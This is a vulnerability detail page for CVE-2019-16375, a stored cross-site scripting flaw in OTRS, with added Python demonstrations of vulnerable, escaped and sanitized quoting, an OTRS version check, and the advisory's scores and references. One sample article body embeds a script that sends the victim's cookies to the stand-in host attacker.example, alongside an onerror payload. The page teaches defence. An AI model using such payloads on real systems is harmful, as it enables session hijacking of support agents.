Vulnerability Details : CVE-2019-16375
An issue was discovered in Open Ticket Request System (OTRS) 7.0.x through 7.0.11, and Community Edition 5.0.x through 5.0.37 and 6.0.x through 6.0.22. An attacker who is logged in as an agent or customer user with appropriate permissions can create a carefully crafted string containing malicious JavaScript code as an article body. This malicious code is executed when an agent composes an answer to the original article.
Vulnerability category: Cross site scripting (XSS)
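The bug class the description names, as an added illustration that is not OTRS code and does not reproduce the project's own templates: a hypothetical ticketing helper that quotes a stored article body into the agent's reply editor, first verbatim (the stored payload then runs in the agent's session), then with output encoding, then with an allowlist sanitizer that keeps basic formatting but drops active content. The article body, the helper names and the allowlist are assumptions; the parser-based `active_content` check only models what the agent's browser would execute and is not itself a defence.

```python
import html
from html.parser import HTMLParser

# Constructed attacker-controlled article body (assumption: what a customer or
# agent with article-create permission could store). It mixes legitimate
# markup with a script tag and an event-handler payload.
MALICIOUS_ARTICLE_BODY = (
    "Hello,<br>my printer is broken."
    '<script>document.location="https://attacker.example/?c="+document.cookie</script>'
    '<img src=x onerror="alert(document.domain)">'
)


def quote_article_vulnerable(body: str) -> str:
    """Hypothetical 'compose answer' helper that quotes the stored article
    verbatim. The agent's browser interprets every tag in the attacker's
    text: stored XSS that fires in the agent session."""
    return f'<div class="quote">{body}</div>'


def quote_article_escaped(body: str) -> str:
    """Same helper with output encoding: the body is rendered as text, so the
    script tag and the onerror attribute appear literally and never run."""
    return f'<div class="quote">{html.escape(body, quote=True)}</div>'


class AllowlistSanitizer(HTMLParser):
    """Keeps a few formatting tags (attributes dropped), removes every other
    tag, discards <script>/<style> bodies and escapes all text."""

    ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong"}

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.parts: list[str] = []
        self._skip_depth = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1
        elif tag in self.ALLOWED_TAGS and not self._skip_depth:
            self.parts.append(f"<{tag}>")  # attributes dropped on purpose

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip_depth = max(0, self._skip_depth - 1)
        elif tag in self.ALLOWED_TAGS and tag != "br" and not self._skip_depth:
            self.parts.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.parts.append(html.escape(data, quote=True))

    def result(self) -> str:
        return "".join(self.parts)


def quote_article_sanitized(body: str) -> str:
    """Helper that keeps rich-text formatting but strips active content."""
    sanitizer = AllowlistSanitizer()
    sanitizer.feed(body)
    sanitizer.close()
    return f'<div class="quote">{sanitizer.result()}</div>'


class ActiveContentDetector(HTMLParser):
    """Records what a browser would execute in a rendered fragment: script
    tags, on* event handlers and javascript: URLs. Demo aid, not a sanitizer."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, value in attrs:  # HTMLParser lower-cases attribute names
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")
            elif name in ("href", "src") and (value or "").strip().lower().startswith("javascript:"):
                self.findings.append(f"{tag}@{name}=javascript:")


def active_content(fragment: str) -> list[str]:
    detector = ActiveContentDetector()
    detector.feed(fragment)
    detector.close()
    return detector.findings


if __name__ == "__main__":
    for name, helper in (("vulnerable", quote_article_vulnerable),
                         ("escaped", quote_article_escaped),
                         ("sanitized", quote_article_sanitized)):
        print(f"{name:10s} -> {active_content(helper(MALICIOUS_ARTICLE_BODY))}")
```

Escaping is the right default when the quoted text is plain; the allowlist variant is what a system that deliberately stores HTML articles needs, and the point of the CVE is that the encoding or sanitization must happen at the moment the stored body is put into the compose page, regardless of what was checked when the article was saved.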
Products affected by CVE-2019-16375
- Otrs » Otrs » Community Edition, versions from 5.0.0 up to and including 5.0.37 (cpe:2.3:a:otrs:otrs:*:*:*:*:community:*:*:*)
- Otrs » Otrs » Community Edition, versions from 6.0.0 up to and including 6.0.22 (cpe:2.3:a:otrs:otrs:*:*:*:*:community:*:*:*)
- Otrs » Otrs, generic product CPE with no version range (the 7.0.x through 7.0.11 range appears only in the description above): cpe:2.3:a:otrs:otrs:*:*:*:*:*:*:*:*
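A quick way to check an installed version against the ranges given in the description, as an added example rather than OTRS tooling. It assumes the RELEASE file in the OTRS install directory consists of KEY = VALUE lines with a VERSION entry; the sample file content is constructed. Versions on branches the CVE does not mention are reported as None instead of a misleading "not affected".

```python
import re
from typing import Optional

# Affected ranges exactly as the CVE description states them:
# (major, minor) branch -> last vulnerable release on that branch.
AFFECTED_BRANCHES = {
    (7, 0): (7, 0, 11),   # OTRS 7.0.x through 7.0.11
    (6, 0): (6, 0, 22),   # Community Edition 6.0.x through 6.0.22
    (5, 0): (5, 0, 37),   # Community Edition 5.0.x through 5.0.37
}

# Constructed sample of the RELEASE file in an OTRS install directory
# (assumed "KEY = VALUE" layout; the values are made up for this demo).
SAMPLE_RELEASE_FILE = """PRODUCT = OTRS
VERSION = 6.0.22
"""


def parse_version(text: str) -> tuple[int, int, int]:
    """Parse a plain X.Y.Z release string; anything else is rejected rather
    than guessed at (a beta or patch-level suffix must be resolved by hand)."""
    match = re.fullmatch(r"\s*(\d+)\.(\d+)\.(\d+)\s*", text)
    if not match:
        raise ValueError(f"unrecognised OTRS version string: {text!r}")
    major, minor, patch = (int(part) for part in match.groups())
    return major, minor, patch


def is_affected(version_text: str) -> Optional[bool]:
    """True if the version lies in a range the CVE lists as vulnerable,
    False if it is a later release on a listed branch, None if the branch is
    not mentioned by the CVE at all (for example 4.0.x or 8.0.x)."""
    version = parse_version(version_text)
    last_vulnerable = AFFECTED_BRANCHES.get(version[:2])
    if last_vulnerable is None:
        return None
    return version <= last_vulnerable


def parse_release_file(text: str) -> dict[str, str]:
    """Read KEY = VALUE lines; keys are normalised to upper case."""
    info: dict[str, str] = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            info[key.strip().upper()] = value.strip()
    return info


def check_release_file(text: str) -> Optional[bool]:
    """Apply is_affected() to the VERSION entry of a RELEASE file."""
    return is_affected(parse_release_file(text)["VERSION"])


if __name__ == "__main__":
    for sample in ("5.0.37", "5.0.38", "6.0.22", "6.0.23", "7.0.11", "7.0.12", "8.0.1"):
        print(sample, is_affected(sample))
    print("RELEASE file:", check_release_file(SAMPLE_RELEASE_FILE))
```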
Exploit prediction scoring system (EPSS) score for CVE-2019-16375
EPSS score: 0.10% (probability of exploitation activity in the next 30 days)
EPSS percentile: ~40% (the proportion of vulnerabilities scored at or below this one)
CVSS scores for CVE-2019-16375
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen
---|---|---|---|---|---|---
3.5 | LOW | AV:N/AC:M/Au:S/C:N/I:P/A:N (CVSS v2) | 6.8 | 2.9 | NIST |
5.4 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N | 2.3 | 2.7 | NIST |
CWE ids for CVE-2019-16375
- The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Assigned by: nvd@nist.gov (Primary)
References for CVE-2019-16375
- http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00038.html
  [security-announce] openSUSE-SU-2020:0551-1: moderate: Recommended update (link broken)
- http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00066.html
  [security-announce] openSUSE-SU-2020:1475-1: moderate: Recommended update (link broken)
- https://community.otrs.com/category/security-advisories-en/
  Security Advisories Archive | community.otrs.com (vendor advisory)
- https://otrs.com/release-notes/otrs-security-advisory-2019-13/
  OTRS Security Advisory 2019-13 | OTRS (release notes; vendor advisory)
- https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html
  [SECURITY] [DLA 3551-1] otrs2 security update
- http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00077.html
  [security-announce] openSUSE-SU-2020:1509-1: moderate: Recommended update (link broken)